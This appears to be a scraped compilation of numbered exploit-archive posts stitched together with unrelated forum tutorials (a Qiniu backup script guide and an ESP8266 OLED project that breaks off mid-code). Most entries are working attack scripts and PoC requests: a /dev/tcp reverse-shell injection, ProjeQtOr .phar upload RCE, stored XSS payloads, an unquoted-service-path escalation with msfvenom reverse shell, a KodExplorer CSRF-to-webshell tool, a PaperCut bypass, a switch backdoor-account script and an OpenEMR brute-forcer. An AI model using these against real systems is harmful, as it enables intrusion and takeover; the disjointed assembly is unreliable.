                "parameters": [
                    {
                        "name": "ok",
                        "type": "tagid",
                        "value": ""
                    }
                ],
                "mode": "",
                "id": "",
                "test": "true",
                "name": "ok",
                "outputId": "",
                "code": "require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost, lport)
            }
        }
    }
    response = requests.post(url, json=payload)


args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter,
                                 usage="python exploit.py --rhost <ip> --rport <rport> --lhost <ip> --lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
# default kept as a string: it is concatenated into the URL above
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default='1881')
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args = parser.parse_args()

main(args.rhost, args.rport, args.lhost, args.lport)
```
12. Exploit Title: ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

It is possible to include a PHP file with the .phar extension while uploading an image. RCE is triggered when we visit the uploaded file again.

Payload: `<?php echo system("id"); ?>`

PoC request:

```http
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream

<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"

User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"

file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"

html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
```

Visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
13. Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date of found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

Steps:

1. After uploading the image, we write `<img%20src=x%20onerror=alert(4)>` instead of the tag (keyword) while editing the image.

Payload: `<img%20src=x%20onerror=alert(4)>`

```http
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close

name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
```
14.

```
#####################################################################
# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path
# Date: 2023/04/21
# Exploit Author: msd0pe
# Vendor Homepage: https://oscinventory-ng.org
# Software Link: https://github.com/OCSInventory-NG/WindowsAgent
# My Github: https://github.com/msd0pe-1
# Fixed in version 2.3.1.0
#####################################################################
```

OCS Inventory NG Windows Agent: versions below 2.3.1.0 contain an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:

```
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OCS Inventory Service   OCS Inventory Service   C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe   Auto
```

[2] Get information about the service:

```
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OCS Inventory Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OCS Inventory Service
        DEPENDENCIES       : RpcSs
                           : EventLog
                           : Winmgmt
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
```

[3] Generate a reverse shell:

```
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
```

[4] Upload the reverse shell to C:\Program Files (x86)\OCS.exe

```
> put OCS.exe
> ls
drw-rw-rw-          0  Sat Apr 22 05:20:38 2023  .
drw-rw-rw-          0  Sat Apr 22 05:20:38 2023  ..
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Common Files
-rw-rw-rw-        174  Sun Jul 24 08:12:38 2022  desktop.ini
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022  Internet Explorer
drw-rw-rw-          0  Sun Jul 24 07:27:06 2022  Microsoft
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Microsoft.NET
drw-rw-rw-          0  Sat Apr 22 04:51:20 2023  OCS Inventory Agent
-rw-rw-rw-       7168  Sat Apr 22 05:20:38 2023  OCS.exe
drw-rw-rw-          0  Sat Apr 22 03:24:58 2023  Windows Defender
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022  Windows Mail
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022  Windows Media Player
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Windows Multimedia Platform
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Windows NT
drw-rw-rw-          0  Fri Oct 28 05:25:41 2022  Windows Photo Viewer
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Windows Portable Devices
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  Windows Sidebar
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022  WindowsPowerShell
```

[5] Start a listener:

```
> nc -lvp 4444
```

[6] Restart the service/server:

```
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
```

OR

```
> shutdown /r
```

[7] Enjoy!

```
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```
15.

```python
# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944

import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep


def banner():
    # The original prints an ASCII-art logo; only its caption survived extraction
    print('''
    [KODExplorer <= v4.49 Remote Code Execution]
    [Coded by MrEmpy]
    ''')


def httpd():
    # Serves the ./http directory so the target can fetch shell.php from us
    port = 8080
    httpddir = os.path.join(os.path.dirname(__file__), 'http')
    os.chdir(httpddir)
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()


def webshell(url, lhost):
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(payload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    # serverDownload fetches a remote URL into savePath on behalf of the logged-in admin (the CSRF)
    print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}{path}&url=http://{lhost}:8080/shell.php&uuid=&time=')
    print(f'[+] After the victim opens the URI, his shell will be hosted at {url}{path}shell.php?cmd=whoami')


def reverseshell(url, lhost):
    rvpayload = 'https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(reqpayload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}{path}&url=http://{lhost}:8080/shell.php&uuid=&time=')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n')
    while True:
        hitshell = requests.get(f'{url}{path}shell.php')
        sleep(1)
        if hitshell.status_code != 200:
            continue
        print('[+] Shell sent and executed!')
        break


def main(url, lhost, mode):
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='target url', dest='url', required=True)
    parser.add_argument('-lh', '--local-host', action='store', help='local host', dest='lhost', required=True)
    parser.add_argument('-m', '--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)
```
16.

```python
# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350

import requests
from bs4 import BeautifulSoup
import re


def vuln_version():
    ip = input("Enter the ip address: ")
    url = "http://" + ip + ":9191" + "/app?service=page/SetupCompleted"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    if text_div is None:
        # The SetupCompleted page is not served: nothing to read a version from
        print('Not Vulnerable')
        return
    product_span = text_div.find('span', class_='product')

    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break

    if version_span is None:
        print('Not Vulnerable')
    else:
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")


if __name__ == "__main__":
    vuln_version()
```
17. I have previously mentioned how to automatically back up FTP and databases on a Linux VPS daily, but that requires building your own FTP space, which is a bit more troublesome than this tutorial. If you don't have FTP space, you can apply for Qiniu Cloud Storage; the free 10G of space is enough to back up ordinary small sites. Here is a script that backs up website files and databases to Qiniu. The actual test results are pretty good, and you can back up automatically every day by setting up a scheduled task on the Linux VPS.

The GitHub project address of this script: https://github.com/ccbikai/backuptoqiniu

First register a Qiniu Cloud account; after real-name authentication you get 10G of traffic and space. After registering, find Object Storage on the left, create a new storage space, and remember the name of the newly created storage space, which you will need later.

Method

Note: the system python version must be above 2.7

1. Install zip

```
apt-get install zip
```

Note: on CentOS the command is `yum install zip`

2. Install the backup script

```
wget --no-check-certificate -O backuptoqiniu.zip https://www.moerats.com/usr/down/backuptoqiniu.zip
unzip backuptoqiniu.zip
cd backuptoqiniu
python setup.py install
```

3. Edit the configuration file

Use the `vi backuptoqiniu.sh` command or the WinSCP tool to edit it:

```sh
## Backup Configuration Information ##
# Backup name, used to label the backup
BACKUP_NAME='backup'
# Backup directories, separate multiple entries with spaces
BACKUP_SRC='/home/wwwroot/moerats.com'
# Mysql host address
MYSQL_SERVER='localhost'
# Mysql username
MYSQL_USER='root'
# Mysql password
MYSQL_PASS='mysqlpassword'
# Mysql databases to back up, separate multiple entries with spaces
MYSQL_DBS='dbname'
# Temporary directory for the backup files, generally no change is required
BACKUP_DIR='/tmp/backuptoqiniu'
# Password for the compressed backup file, to protect the archive
BACKUP_FILE_PASSWD='123456'
## Backup Configuration Information End ##

## Qiniu Configuration Information ##
# Storage space, i.e. the bucket we created on Qiniu
QINIU_BUCKET='Rats'
QINIU_ACCESS_KEY='ACCESS_KEY'
QINIU_SECRET_KEY='SECRET_KEY'
## Qiniu Configuration Information End ##
```

The script configuration above is basically self-explanatory. The first half is filled in with the website's information, and the last three values are obtained from Qiniu: QINIU_BUCKET is the storage space name, and ACCESS_KEY and SECRET_KEY are obtained in the personal panel under key management; the long strings labelled AK and SK are the keys.

4. Test the script

```
chmod +x backuptoqiniu.sh
./backuptoqiniu.sh
```

After it runs normally, we can go to the Qiniu console and check whether a compressed package has appeared in the newly created storage space.

5. Set the script to run automatically

```
crontab -e
0 2 * * 0 /bin/bash /root/backuptoqiniu/backuptoqiniu.sh   # Add this line
```

The line above uses a crontab scheduled task to run this script automatically at 2 a.m. every day. For the specific usage of crontab, please refer to the article: Detailed explanation of the commands for installing Crontab on Linux systems and scheduling tasks.

Note: very often our VPS needs to use scheduling when running scripts or restarting certain software. At that point we need the Crontab scheduling software.

Note: if you are using a foreign VPS, you may also need to set it to domestic time with `cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime`. Then `service cron restart` starts your scheduled task.

The effect is as follows: you can view the backup files in Qiniu Cloud.
  18. # Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print("Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])
  19. # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force
# Date: 2023-04-28
# Exploit Author: abhhi (Abhishek Birdawade)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz
# Version: 7.0.1
# Tested on: Windows

'''
Example Usage:
- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt
'''

import requests
import sys
import argparse, textwrap
from pwn import *

# Expected Arguments
parser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass",
                                 formatter_class=argparse.RawTextHelpFormatter,
                                 epilog=textwrap.dedent('''
Exploit Usage :
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txt
python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)")
parser.add_argument("-u", "--username", help="Username to Bruteforce for.")
parser.add_argument("-ul", "--userlist", help="Username Dictionary")
parser.add_argument("-p", "--passlist", help="Password Dictionary")
args = parser.parse_args()

if len(sys.argv) < 2:
    print(f"Exploit Usage: python3 exploitBF.py -h")
    sys.exit(1)

# Variables
LoginPage = args.url
Username = args.username
Username_list = args.userlist
Password_list = args.passlist

log.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')


def login(Username, Password):
    session = requests.session()
    r = session.get(LoginPage)

    # Progress Check
    process = log.progress('Brute Force')

    # Specifying Headers Value
    headerscontent = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Referer': f"{LoginPage}",
        'Origin': f"{LoginPage}",
    }

    # POST REQ data
    postreqcontent = {
        'new_login_session_management': 1,
        'languageChoice': 1,
        'authUser': f"{Username}",
        'clearPass': f"{Password}"
    }

    # Sending POST REQ
    r = session.post(LoginPage, data=postreqcontent, headers=headerscontent, allow_redirects=False)

    # Printing Username:Password
    process.status('Testing -> {U}:{P}'.format(U=Username, P=Password))

    # Conditional loops: a successful login redirects to the main tabs page
    if 'Location' in r.headers:
        if "/interface/main/tabs/main.php" in r.headers['Location']:
            print()
            log.info(f'SUCCESS !!')
            log.success(f"Use Credential -> {Username}:{Password}")
            sys.exit(0)


# Reading User.txt & Pass.txt files
if Username_list:
    userfile = open(Username_list).readlines()
    for Username in userfile:
        Username = Username.strip()
        passfile = open(Password_list).readlines()
        for Password in passfile:
            Password = Password.strip()
            login(Username, Password)
elif Username:
    # Single username supplied with -u
    passfile = open(Password_list).readlines()
    for Password in passfile:
        Password = Password.strip()
        login(Username, Password)
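Added detection example, not code from the post above: it parses constructed combined-format access-log lines (the log format and the sample lines are assumptions) and flags clients that hit the OpenEMR login endpoint with a burst of failed logins, using the same success signal the PoC relies on (a 302 to /interface/main/tabs/main.php) and assuming a failed login re-renders the form with HTTP 200.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (combined log format) for an OpenEMR host.
# The first six lines are one client hammering the login endpoint within seconds.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Apr/2023:10:00:01 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2023:10:00:02 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2023:10:00:02 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2023:10:00:03 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2023:10:00:04 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Apr/2023:10:00:05 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Apr/2023:10:00:30 +0000] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [28/Apr/2023:10:05:00 +0000] "GET /interface/main/tabs/main.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATH = "/interface/main/main_screen.php"


def parse_line(line):
    """Split one combined-format line into (ip, timestamp, method, path, status)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0], int(m.group("status"))


def login_attempts(log_text):
    """Return (ip, timestamp, status) for each POST to the login endpoint.
    Assumption: a failed login answers 200 (form re-rendered); a successful one
    answers 302 to /interface/main/tabs/main.php, which is what the PoC checks."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            out.append((rec[0], rec[1], rec[4]))
    return out


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed logins inside a sliding time window.
    The alert also records whether a success followed the burst, i.e. whether
    the dictionary attack actually found a working credential."""
    by_ip = defaultdict(list)
    for ip, ts, status in login_attempts(log_text):
        by_ip[ip].append((ts, status))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [ts for ts, st in events if st == 200]
        for i in range(len(fails)):
            j = i
            while j < len(fails) and fails[j] - fails[i] <= window:
                j += 1
            if j - i >= threshold:
                last_fail = fails[j - 1]
                success_after = any(st == 302 and ts >= last_fail for ts, st in events)
                alerts[ip] = {"failures": j - i, "success_after_burst": success_after}
                break
    return alerts
```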
  20. # Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Steps to Reproduce ###

- Please login from this address: https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T
  21. Equipment List

esp8266 development board
oled (0.96)
DuPont line

Equipment circuit diagram

Add library

u8g2 library file

Project 1: Hello World

/*
  HelloWorld.ino
  esp8266+oled project example
  Forum: bbskali.cn
  Blog: blog.bbskali.cn
*/
#include <Arduino.h>
#include <U8g2lib.h>

#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif

U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // Here D1 and D2 are the pins the display is wired to

void setup(void) {
  u8g2.begin();
}

void loop(void) {
  u8g2.clearBuffer();                   // clear the internal memory
  u8g2.setFont(u8g2_font_ncenB08_tr);   // choose a suitable font
  u8g2.drawStr(0, 10, "Hello World!");  // write something to the internal memory
  u8g2.sendBuffer();                    // transfer internal memory to the display
  delay(1000);
}

The effect is as follows

Project 2: Display Chinese characters. The code is as follows:

/*
  esp8266+oled display
  Chinese character display project
  Forum address: bbskali.cn
  Blog: blog.bbskali.cn
*/
#include <Arduino.h>
#include <U8g2lib.h>

#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif

U8G2_SSD1306_128X64_NONAME_F_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // All boards without reset of the display

void setup(void) {
  u8g2.begin();
  u8g2.enableUTF8Print();  // enable UTF8 support for the Arduino print() function
}

void loop(void) {
  u8g2.setFont(u8g2_font_unifont_t_chinese2);  // use chinese2 for all the glyphs of "Hello world"
  u8g2.setFontDirection(0);
  u8g2.clearBuffer();
  u8g2.setCursor(0, 15);
  u8g2.print("kali forum");
  u8g2.setCursor(0, 30);
  u8g2.print("bbskali.cn");  // Chinese "Hello World"
  u8g2.setCursor(0, 45);
  u8g2.print("kali Hacker Teaching");
  u8g2.sendBuffer();
  delay(1000);
}

The effect is as follows:

Project 3: Display multiple lines of text. The code is as follows:

/*
  esp8266+oled scrolling text project
*/
#include <Arduino.h>
#include <U8g2lib.h>

#ifdef U8X8_HAVE_HW_SPI
#include <SPI.h>
#endif
#ifdef U8X8_HAVE_HW_I2C
#include <Wire.h>
#endif

U8G2_SSD1306_128X64_NONAME_1_SW_I2C u8g2(U8G2_R0, /* clock=*/ D2, /* data=*/ D1, /* reset=*/ U8X8_PIN_NONE); // All boards without reset of the display

#define FONT u8g2_font_wqy14_t_gb2312b
//#define FONT u8g2_font_wqy16_t_chinese1
//#define FONT u8g2_font_wqy16_t_gb2312b

// The next two macros define the scroll speed of the short story
#define SCROLL_DELTA 2
#define SCROLL_DELAY 200

const char c_str[] =
  "Shen Nong\n\n"
  "KALI Forum Introduction\n"
  "kali forum was created at 20\n"
  "17, Webmaster Priess\n"
  "This forum is based on kali"
  "Full Research and Cybersecurity\n"
  "For the convenience of friends' learning\n"
  "We built this forum\n"
  "Forum study is completely free\n"
  "Our URL :\n"
  "bbskali.cn\n"
  "WeChat official account:\n"
  "【kali Hacker Teaching】\n"
  "Thank you for your attention. \n";

char buf[48];              // there are at most 8 chinese glyphs per line, max buf size is 8*3=24

uint8_t total_lines;       // the total number of lines in the story
uint8_t i;                 // loop variable for the lines
uint8_t line_cnt;          // number of lines to draw, usually equal to lines_per_draw
uint8_t start_line;        // topmost visible line, derived from top_window_pos
uint8_t lines_per_draw;    // how many lines to draw on the screen, derived from font and display height
uint16_t glyph_height;     // height of the glyphs
uint16_t top_window_pos;   // defines the display position in pixel within the text
uint16_t total_height;     // total height in pixel, derived from font height and total_lines
u8g2_uint_t top_offset;    // offset between the first visible line and the display

void setup(void) {
  /* U8g2 Project: SSD1306 Test Board */
  pinMode(D2, OUTPUT);
  pinMode(D1, OUTPUT);
  digitalWrite(10, 0);
  digitalWrite(9, 0);

  /* U8g2 Project: T6963 Test Board */
  //pinMode(18, OUTPUT);
  //digitalWrite(18, 1);

  /* U8g2 Project: KS0108 Test Board */
